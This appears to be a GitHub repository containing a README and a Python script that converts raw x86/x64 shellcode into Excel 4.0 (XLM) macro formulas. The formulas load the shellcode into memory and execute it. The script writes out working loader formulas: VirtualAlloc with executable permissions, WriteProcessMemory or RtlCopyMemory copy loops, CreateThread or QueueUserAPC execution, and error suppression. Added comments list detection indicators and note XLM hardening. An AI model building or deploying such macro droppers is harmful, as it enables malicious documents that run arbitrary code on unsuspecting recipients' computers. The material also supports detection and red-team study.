├── README.md └── generateExcel4.py /README.md: -------------------------------------------------------------------------------- 1 | # Excel 4.0 Shellcode Macro Generator 2 | 3 | This program takes x86 and x64 shellcode bin files as arguments, converts them to Excel CHAR shellcode, and adds the formulas necessary to inject it into memory and execute it. (Be sure the bin files have been modified so that they contain no null bytes.) 4 | 5 | If the formula finds Excel is running in a 32-bit process, the x86 shellcode will be executed. Likewise, if Excel is found to be running in a 64-bit process, the x64 shellcode will be executed. 6 | 7 | I could not find a good way to create the 4.0 macro sheet from Python, so the script writes its output to a CSV file instead. You can manually run the macro code from within Excel as a CSV, or if you would like a macro-enabled document, copy and paste the contents to a new XLS/XLSM document in an Excel 4.0 macro sheet. 8 | 9 | By default, the output is written to 'output.csv'. 10 | 11 | Written for Python 3. 
12 | 13 | # Usage 14 | 15 | python excel4macro.py [x86payload.bin] [x64payload.bin] 16 | 17 | # Creating a 4.0 Macro 18 | In an excel sheet, the 4.0 macro option can be found by simply right-clicking on the current sheet and selecting ***Insert -> MS Excel 4.0 Macro.*** 19 | 20 | ![image](https://user-images.githubusercontent.com/51035066/82890713-9b330680-9f1a-11ea-9e0f-c23b4b67bfce.png) 21 | 22 | ![image](https://user-images.githubusercontent.com/51035066/82890736-a423d800-9f1a-11ea-8937-04a98db48cc3.png) 23 | 24 | ![image](https://user-images.githubusercontent.com/51035066/82890763-ac7c1300-9f1a-11ea-91df-ba41c9fcde99.png) 25 | -------------------------------------------------------------------------------- /generateExcel4.py: -------------------------------------------------------------------------------- 1 | from openpyxl import Workbook, load_workbook 2 | from itertools import zip_longest 3 | import argparse 4 | import sys 5 | import codecs 6 | import csv 7 | 8 | parser = argparse.ArgumentParser(description='Creates CSV with Excel 4.0 Macro code to inject shellcode into memory. Outputs to "output.csv" ') 9 | parser.add_argument('[x86 bin file]', help='the file path for your x86 shellcode file') 10 | parser.add_argument('[x64 bin file]', help='the file path for your x64 shellcode file') 11 | args = parser.parse_args() 12 | 13 | 14 | #Get bin files 15 | bin86 = sys.argv[1] 16 | bin64 = sys.argv[2] 17 | 18 | #Initiate Shellcode Lists 19 | shellcode86 = [] 20 | shellcode64 = [] 21 | 22 | #Convert each byte to base 16 hex for excel. Modified from: 23 | #https://github.com/mdsecactivebreach/SharpShooter/blob/master/modules/excel4.py 24 | def bytes2int(byte): 25 | return int(codecs.encode(byte, ('hex')), 16) 26 | 27 | #Create Shellcode. 
#Modified code from:
#https://github.com/mdsecactivebreach/SharpShooter/blob/master/modules/excel4.py
# NOTE(review): the indentation below is reconstructed from a flattened
# listing; confirm block nesting against the upstream file.

def generateShellcode(binfile, arch):
    """Append Excel formula rows encoding the bytes of *binfile* for *arch*.

    The file is read one byte at a time. Each byte is rendered as
    ``CHAR(n)`` and up to 20 of them are joined with ``&`` into a single
    formula string starting with ``=``. Finished rows are appended to the
    module-level ``shellcode86`` list when ``arch`` is ``'x86'`` and to
    ``shellcode64`` when it is ``'x64'``; any other value appends nothing.
    Nothing is returned.
    """

    with open(binfile, 'rb') as sfile:

        i = 0
        excelShellcode = '='
        byte = sfile.read(1)

        while byte != b'':
            # Despite the name, this is the byte's value as a decimal string:
            # bytes2int() parses the hex form into an int and str() prints it
            # in base 10.
            hexByte= str(bytes2int(byte))
            excelShellcode += f'CHAR({hexByte})'
            byte = sfile.read(1)
            i +=1

            # 20 bytes per cell matches the "* 20" stride used by the copy
            # formulas in memory86 / memory64 below.
            if i == 20:
                if arch == 'x86':
                    shellcode86.append(excelShellcode)
                    excelShellcode = '='
                elif arch == 'x64':
                    shellcode64.append(excelShellcode)
                    excelShellcode = '='
                i = 0
            else:
                excelShellcode+=('&')

        #Append last line
        # [:-1] drops the final character of the pending row, i.e. the
        # trailing '&' when the last row is only partly filled.
        if arch == 'x64':
            shellcode64.append(excelShellcode[:-1])

        elif arch == 'x86':
            shellcode86.append(excelShellcode[:-1])

#Generate shellcode lists
# bin86 / bin64 are the two paths read from sys.argv earlier in the script.
generateShellcode(bin86, 'x86')
generateShellcode(bin64, 'x64')

# Close each CHAR() column with a RETURN() formula.
shellcode86.append('=RETURN()')
shellcode64.append('=RETURN()')

#Write to excel
#Generate column values
# Sheet layout, as fixed by `cols` further down (column numbers are what the
# R<row>C<col> references in the formulas point at):
#   C1 empty (R1C1 is used as the row counter)   C2 memory64   C3 shellcode64
#   C4 activateMacro   C5 osCheck   C6 memory86   C7 shellcode86
#
# Analyst notes for the two loader columns. The numeric literals are Win32
# constants: 4096 = MEM_COMMIT, 12288 = MEM_COMMIT|MEM_RESERVE,
# 64 = PAGE_EXECUTE_READWRITE, -1 / -2 = current-process / current-thread
# pseudo-handles. A macro sheet (or CSV) carrying CALL() formulas into
# Kernel32/ntdll for VirtualAlloc, WriteProcessMemory, RtlCopyMemory,
# CreateThread, QueueUserAPC or NtTestAlert, next to long CHAR()&CHAR()
# chains, is the static indicator this generator leaves behind.
# NOTE(review): current Microsoft 365 Excel builds disable Excel 4.0 (XLM)
# macros by default and pass XLM through AMSI; confirm both are enforced by
# policy rather than left to user choice.
memory86 = ['=R1C7()',
            # R2C6: result of VirtualAlloc (size literal 880, RWX protection).
            '=CALL("Kernel32","VirtualAlloc","JJJJJ",0,880,4096,64)',
            '=SELECT(R1C7:R1000:C7,R1C7)','=SET.VALUE(R1C1, 0)',
            # Walk column 7 until an empty cell, copying each cell's text to
            # R2C6 + counter * 20 inside the current process.
            '=WHILE(LEN(ACTIVE.CELL())>0)',
            '=CALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C6 + R1C1 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)',
            '=SET.VALUE(R1C1, R1C1 + 1)','=SELECT(, "R[1]C")','=NEXT()',
            # Starts a thread at the allocated address.
            '=CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C6, 0, 0, 0)',
            '=WORKBOOK.ACTIVATE("Sheet1")',
            '=HALT()']

memory64 = ['=R1C3()',
            # R2C2: VirtualAlloc at requested address 1342177280 (0x50000000),
            # size literal 1000, RWX protection.
            '=CALL("Kernel32","VirtualAlloc","JJJJJ",1342177280,1000,12288,64)',
            '=SELECT(R1C3:R1000:C3,R1C3)',
            '=SET.VALUE(R1C1, 0)',
            # Same copy loop as the x86 column, over column 3, using
            # RtlCopyMemory instead of WriteProcessMemory.
            '=WHILE(LEN(ACTIVE.CELL())>0)',
            '=CALL("kernel32", "RtlCopyMemory", "JJCJ",R2C2 + R1C1 * 20,ACTIVE.CELL(),LEN(ACTIVE.CELL()))',
            '=SET.VALUE(R1C1, R1C1 + 1)',
            '=SELECT(, "R[1]C")',
            '=NEXT()',
            # Queues the allocated address as an APC on the current thread,
            # then calls NtTestAlert.
            '=CALL("Kernel32","QueueUserAPC","JJJJ",R2C2,-2,0)',
            '=CALL("ntdll","NtTestAlert","J")',
            '=WORKBOOK.ACTIVATE("Sheet1")',
            '=HALT()']

# Column 4: activates the sheet named "Macro1" and hands control to R1C5,
# the first cell of osCheck.
activateMacro = ['=WORKBOOK.ACTIVATE( "Macro1")',
                 '=R1C5()']

# Column 5: architecture dispatch. R2C5 is the literal path, R3C5 tries to
# FOPEN it, and R4C5 branches on ISERROR: failure runs R1C2() (the memory64
# column), success runs R1C6() (the memory86 column).
# NOTE(review): this tests for the presence of a file under
# "Program Files (x86)", not the bitness of the Excel process itself.
# NOTE(review): the leading ERROR(FALSE, ...) presumably turns off macro
# error handling/prompts - confirm against the XLM function reference.
osCheck = ['=ERROR(FALSE, R2C103:R3C103)',
           r'C:\Program Files (x86)\Microsoft Office\AppXManifest.xml',
           '=FOPEN(R2C5, 2)',
           '=IF(ISERROR(R3C5), R1C2(), R1C6())']

#Define columns
cols = [[''], memory64, shellcode64, activateMacro, osCheck, memory86, shellcode86]

# Transpose the columns into CSV rows; shorter columns are padded with ''.
exportData = zip_longest(*cols, fillvalue = '')

#write to output.csv
# The output path is fixed; an existing output.csv in the working directory
# is overwritten. Almost every non-empty cell written begins with '='.
with open('output.csv', 'w', newline='') as csvfile:
    writer = csv.writer(csvfile)
    writer.writerows(exportData)
print('Done.')